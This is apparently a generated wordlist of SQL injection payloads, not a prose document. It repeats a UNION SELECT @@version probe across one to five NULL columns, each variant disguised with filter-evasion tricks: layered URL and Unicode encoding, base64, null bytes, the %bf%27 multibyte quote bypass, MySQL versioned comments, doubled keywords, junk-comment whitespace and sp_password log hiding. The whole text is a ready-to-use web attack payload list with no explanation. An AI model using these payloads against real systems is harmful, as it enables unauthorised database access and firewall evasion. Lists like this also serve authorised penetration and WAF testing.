' union (select @@version) --

%EF%BC%87 union (select NULL, (select @@version)) --

%00%27 union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --
%00
JyB1bmlvbiAoc2VsZWN0IE5VTEwsIChzZWxlY3QgQEB2ZXJzaW9uKSkgLS0K
' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%254E%2555%254C%254C%252C%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%4E%55%4C%4C%2C%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0029%u0020%u002D%u002D%u000A
' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' /*!30896union (select NULL, (select @@version)) */--

' /*!00000union (select NULL, (select @@version)) */--

' union (select NULL, (select @@version)) --

' UNIOUNIONN (SELSELECTECT NULL, (SELSELECTECT @@version)) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AANULL%C0%AE%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %N%U%L%L%, %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%) %-%-%

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --
 and '0having'='0having'
' union (select NULL, (select @@version)) --
-- sp_password
'/**/union/**/(select/**/NULL,/**/(select/**/@@version))/**/--

'--hPupxexZY%0Aunion--WgcRWRA%0A(select--rliWZwAMoP%0ANULL,--jSutpL%0A(select--mybDgqPDnli%0A@@version))--RhjVNEJs%0A----xuStcFVsZX%0A
'%23WKLWLGL%0Aunion%23vhXCDGhdgZXP%0A(select%23PvuaTZkdIaSz%0ANULL,%23sdOmjXRyzLn%0A(select%23UguaNv%0A@@version))%23bwbUvDZgRkc%0A--%23SNdOoISDZPyC%0A
'%23GkmhBVoOOBQY%0Aunion%23HbdbJPSjVoZ%0A(select%23hqbPVSpaftI%0ANULL,%23eGVEyMkx%0A(select%23mYjlvdtSBF%0A@@version))%23PAGkMg%0A--%23cQVzwuKzw%0A
'%08union%0C(select%01NULL,%08(select%0F@@version))%0B--

'%23%0Aunion%23%0A(select%23%0ANULL,%23%0A(select%23%0A@@version))%23%0A--%23%0A
'%09union%0A(select%0ANULL,%09(select%0B@@version))%09--

'--%0Aunion--%0A(select--%0ANULL,--%0A(select--%0A@@version))--%0A----%0A
'+union+(select+NULL,+(select+@@version))+--

'%0Aunion%0A(select%0DNULL,%0A(select%09@@version))%0C--

' union (select NULL, (select @@version)) --

%bf%27 union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

' union (select NULL, (select @@version)) --

%EF%BC%87 union (select NULL, NULL, (select @@version)) --

%00%27 union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --
%00
JyB1bmlvbiAoc2VsZWN0IE5VTEwsIE5VTEwsIChzZWxlY3QgQEB2ZXJzaW9uKSkgLS0K
' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0029%u0020%u002D%u002D%u000A
' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' /*!30481union (select NULL, NULL, (select @@version)) */--

' /*!00000union (select NULL, NULL, (select @@version)) */--

' union (select NULL, NULL, (select @@version)) --

' UUNIONNION (SELESELECTCT NULL, NULL, (SELESELECTCT @@version)) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %N%U%L%L%, %N%U%L%L%, %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%) %-%-%

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --
 and '0having'='0having'
' union (select NULL, NULL, (select @@version)) --
-- sp_password
'/**/union/**/(select/**/NULL,/**/NULL,/**/(select/**/@@version))/**/--

'--ezxAptQo%0Aunion--OZajyyR%0A(select--xcKWHmOPbX%0ANULL,--yxvWALYp%0ANULL,--KUCzfjWNz%0A(select--aORcqF%0A@@version))--QfHiNz%0A----IQSMosJjL%0A
'%23oENMuplXhtl%0Aunion%23tfWrICXiZDmu%0A(select%23HdXHWxUCU%0ANULL,%23KanffGeY%0ANULL,%23sQIEqbYwPB%0A(select%23IAslYixqBYE%0A@@version))%23cHqYikFUAk%0A--%23gKQPXrp%0A
'%23GVadTrIupRSY%0Aunion%23VcfsYcAqiycS%0A(select%23LwbqPlFVL%0ANULL,%23RWyRHX%0ANULL,%23XcLETvXdiZP%0A(select%23yLWrKU%0A@@version))%23SAuwrjftxTzg%0A--%23QzilcKznyX%0A
'%05union%02(select%0CNULL,%06NULL,%02(select%05@@version))%07--

'%23%0Aunion%23%0A(select%23%0ANULL,%23%0ANULL,%23%0A(select%23%0A@@version))%23%0A--%23%0A
'%09union%0A(select%0CNULL,%0CNULL,%0B(select%0D@@version))%0D--

'--%0Aunion--%0A(select--%0ANULL,--%0ANULL,--%0A(select--%0A@@version))--%0A----%0A
'+union+(select+NULL,+NULL,+(select+@@version))+--

'%0Cunion%0A(select%0DNULL,%0CNULL,%0C(select%0C@@version))%09--

' union (select NULL, NULL, (select @@version)) --

%bf%27 union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

' union (select NULL, NULL, (select @@version)) --

%EF%BC%87 union (select NULL, NULL, NULL,  (select @@version)) --

%00%27 union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --
%00
JyB1bmlvbiAoc2VsZWN0IE5VTEwsIE5VTEwsIE5VTEwsICAoc2VsZWN0IEBAdmVyc2lvbikpIC0tCg==
' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0029%u0020%u002D%u002D%u000A
' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' /*!30558union (select NULL, NULL, NULL,  (select @@version)) */--

' /*!00000union (select NULL, NULL, NULL,  (select @@version)) */--

' union (select NULL, NULL, NULL,  (select @@version)) --

' UNIUNIONON (SESELECTLECT NULL, NULL, NULL,  (SESELECTLECT @@version)) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AA%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %N%U%L%L%, %N%U%L%L%, %N%U%L%L%,  %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%) %-%-%

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --
 and '0having'='0having'
' union (select NULL, NULL, NULL,  (select @@version)) --
-- sp_password
'/**/union/**/(select/**/NULL,/**/NULL,/**/NULL,/**//**/(select/**/@@version))/**/--

'--uZxWMaw%0Aunion--dZYsMynKli%0A(select--nnGUbqwle%0ANULL,--pQCUbHhYGU%0ANULL,--dVLGEAuaFh%0ANULL,--LvtWwa%0A--fFoybU%0A(select--ZfDUJOLc%0A@@version))--xSjqGNqSuZ%0A----aZmzTCsxz%0A
'%23kcyYnuyKu%0Aunion%23fYywcI%0A(select%23gRHWXv%0ANULL,%23NHxCAMbqTlF%0ANULL,%23mTGQZfhA%0ANULL,%23iJhmfpPK%0A%23GuMGVv%0A(select%23PJiAgG%0A@@version))%23zoUbjdpIWxa%0A--%23DgorZtsLFkXz%0A
'%23uWiZMoOPBFL%0Aunion%23eJPDHsbycy%0A(select%23eabNQEDRr%0ANULL,%23bRVitTDkIIoI%0ANULL,%23kpNYQmjXIdL%0ANULL,%23BsMbYVCrUY%0A%23neFWSYcc%0A(select%23NtXhoju%0A@@version))%23OxyrGSj%0A--%23XQIXCO%0A
'%0Dunion%05(select%0BNULL,%04NULL,%05NULL,%0C%08(select%02@@version))%03--

'%23%0Aunion%23%0A(select%23%0ANULL,%23%0ANULL,%23%0ANULL,%23%0A%23%0A(select%23%0A@@version))%23%0A--%23%0A
'%0Cunion%0C(select%0BNULL,%0DNULL,%0ANULL,%0B%0D(select%0D@@version))%09--

'--%0Aunion--%0A(select--%0ANULL,--%0ANULL,--%0ANULL,--%0A--%0A(select--%0A@@version))--%0A----%0A
'+union+(select+NULL,+NULL,+NULL,++(select+@@version))+--

'%09union%0C(select%0ANULL,%0DNULL,%0DNULL,%0D%0D(select%09@@version))%0C--

' union (select NULL, NULL, NULL,  (select @@version)) --

%bf%27 union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL,  (select @@version)) --

%EF%BC%87 union (select NULL, NULL, NULL, NULL,  (select @@version)) --

%00%27 union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
%00
JyB1bmlvbiAoc2VsZWN0IE5VTEwsIE5VTEwsIE5VTEwsIE5VTEwsICAoc2VsZWN0IEBAdmVyc2lvbikpIC0tCg==
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0029%u0020%u002D%u002D%u000A
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' /*!30395union (select NULL, NULL, NULL, NULL,  (select @@version)) */--

' /*!00000union (select NULL, NULL, NULL, NULL,  (select @@version)) */--

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' UUNIONNION (SSELECTELECT NULL, NULL, NULL, NULL,  (SSELECTELECT @@version)) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AA%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %N%U%L%L%, %N%U%L%L%, %N%U%L%L%, %N%U%L%L%,  %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%) %-%-%

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
 and '0having'='0having'
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
-- sp_password
'/**/union/**/(select/**/NULL,/**/NULL,/**/NULL,/**/NULL,/**//**/(select/**/@@version))/**/--

'--NLFIUlrQE%0Aunion--buwuHPn%0A(select--nIjWghpJP%0ANULL,--WpzUnfvrJyIp%0ANULL,--yINdlMRxNLV%0ANULL,--nnWejhik%0ANULL,--EUdJya%0A--crrLtpwJ%0A(select--fFlGwbgM%0A@@version))--GwaxWSUdD%0A----NhuofKUfCiN%0A
'%23dhuRampaRF%0Aunion%23IWyFhApdwXj%0A(select%23ofBQvHsw%0ANULL,%23cEaOCgFA%0ANULL,%23JVbJLGVQwNf%0ANULL,%23mnHXkRJJ%0ANULL,%23mIoGgRtBouM%0A%23DRHyEt%0A(select%23IMivXxd%0A@@version))%23pnHwWP%0A--%23mtbwlZGgI%0A
'%23qmkpugpnI%0Aunion%23ZqCPGsxCSqr%0A(select%23nIuLWXlXxM%0ANULL,%23MsHoynomKdP%0ANULL,%23MWRmzT%0ANULL,%23UwBCorvgcQ%0ANULL,%23HiEPtryGVw%0A%23HEyVjVWTiu%0A(select%23NWYnJu%0A@@version))%23EVUNkYlvAji%0A--%23IVkiWYcVSxcs%0A
'%0Bunion%0A(select%08NULL,%05NULL,%0FNULL,%0DNULL,%07%0D(select%03@@version))%04--

'%23%0Aunion%23%0A(select%23%0ANULL,%23%0ANULL,%23%0ANULL,%23%0ANULL,%23%0A%23%0A(select%23%0A@@version))%23%0A--%23%0A
'%0Bunion%0D(select%0ANULL,%0CNULL,%0ANULL,%0DNULL,%0C%0D(select%0D@@version))%09--

'--%0Aunion--%0A(select--%0ANULL,--%0ANULL,--%0ANULL,--%0ANULL,--%0A--%0A(select--%0A@@version))--%0A----%0A
'+union+(select+NULL,+NULL,+NULL,+NULL,++(select+@@version))+--

'%09union%09(select%0ANULL,%0DNULL,%0ANULL,%0ANULL,%0D%0C(select%0C@@version))%0C--

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

%bf%27 union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  (select @@version)) --

%EF%BC%87 union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

%00%27 union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
%00
JyB1bmlvbiAoc2VsZWN0IE5VTEwsIE5VTEwsIE5VTEwsIE5VTEwsICBOVUxMLCAoc2VsZWN0IEBAdmVyc2lvbikpIC0tCg==
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

%2527%2520%2575%256E%2569%256F%256E%2520%2528%2573%2565%256C%2565%2563%2574%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%254E%2555%254C%254C%252C%2520%2520%254E%2555%254C%254C%252C%2520%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%2529%2520%252D%252D%250A
%27%20%75%6E%69%6F%6E%20%28%73%65%6C%65%63%74%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%4E%55%4C%4C%2C%20%20%4E%55%4C%4C%2C%20%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%29%20%2D%2D%0A
%u0027%u0020%u0075%u006E%u0069%u006F%u006E%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0020%u004E%u0055%u004C%u004C%u002C%u0020%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u0029%u0020%u002D%u002D%u000A
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' /*!30914union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) */--

' /*!00000union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) */--

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' UUNIONNION (SELSELECTECT NULL, NULL, NULL, NULL,  NULL, (SELSELECTECT @@version)) --

%C0%AF%C0%AAunion%C0%AA%C0%AAselect%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AANULL%C0%AE%C0%AA%C0%AANULL%C0%AE%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AB%C0%AA%C0%AF%C0%AF%C0%8A
%' %u%n%i%o%n %(%s%e%l%e%c%t %N%U%L%L%, %N%U%L%L%, %N%U%L%L%, %N%U%L%L%,  %N%U%L%L%, %(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%) %-%-%

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
 and '0having'='0having'
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
-- sp_password
'/**/union/**/(select/**/NULL,/**/NULL,/**/NULL,/**/NULL,/**//**/NULL,/**/(select/**/@@version))/**/--

'--qRkkghmFl%0Aunion--SGUphZZy%0A(select--qMwFNVmgk%0ANULL,--QcCICsr%0ANULL,--ztzfgXNvYLJ%0ANULL,--KqSNabvpimRe%0ANULL,--UCAmFWyrSyL%0A--IkelrrVC%0ANULL,--ykitaaoQn%0A(select--rYiQgQdNL%0A@@version))--DGoixVjI%0A----gtcpZgMWg%0A
'%23lgdPzMLFb%0Aunion%23NHcGPYS%0A(select%23FrTQMpOnregO%0ANULL,%23LIWfOojAEGg%0ANULL,%23xMHisBVOOM%0ANULL,%23uxZJuODuTIIn%0ANULL,%23dVaojlqhev%0A%23OFOZxIPp%0ANULL,%23MPNGNTc%0A(select%23kIOFXe%0A@@version))%23PBMDsy%0A--%23ROSCCZcd%0A
'%23sJfckgQQ%0Aunion%23EdfvJgW%0A(select%23kHJUuvwKh%0ANULL,%23tgeZTKs%0ANULL,%23EeaZnCgA%0ANULL,%23LYBhdsAZ%0ANULL,%23DbiHOOnyRnNz%0A%23FTlEyE%0ANULL,%23ckzzEGsRV%0A(select%23kDWMlgdGyaQm%0A@@version))%23FtWhowZoD%0A--%23yHaBELoQK%0A
'%0Dunion%09(select%05NULL,%0ANULL,%08NULL,%03NULL,%01%04NULL,%03(select%0A@@version))%01--

'%23%0Aunion%23%0A(select%23%0ANULL,%23%0ANULL,%23%0ANULL,%23%0ANULL,%23%0A%23%0ANULL,%23%0A(select%23%0A@@version))%23%0A--%23%0A
'%0Dunion%0B(select%0BNULL,%0BNULL,%0DNULL,%09NULL,%0B%0BNULL,%09(select%0A@@version))%09--

'--%0Aunion--%0A(select--%0ANULL,--%0ANULL,--%0ANULL,--%0ANULL,--%0A--%0ANULL,--%0A(select--%0A@@version))--%0A----%0A
'+union+(select+NULL,+NULL,+NULL,+NULL,++NULL,+(select+@@version))+--

'%0Cunion%0A(select%0DNULL,%09NULL,%0DNULL,%0ANULL,%0C%0DNULL,%0D(select%0D@@version))%09--

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

%bf%27 union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

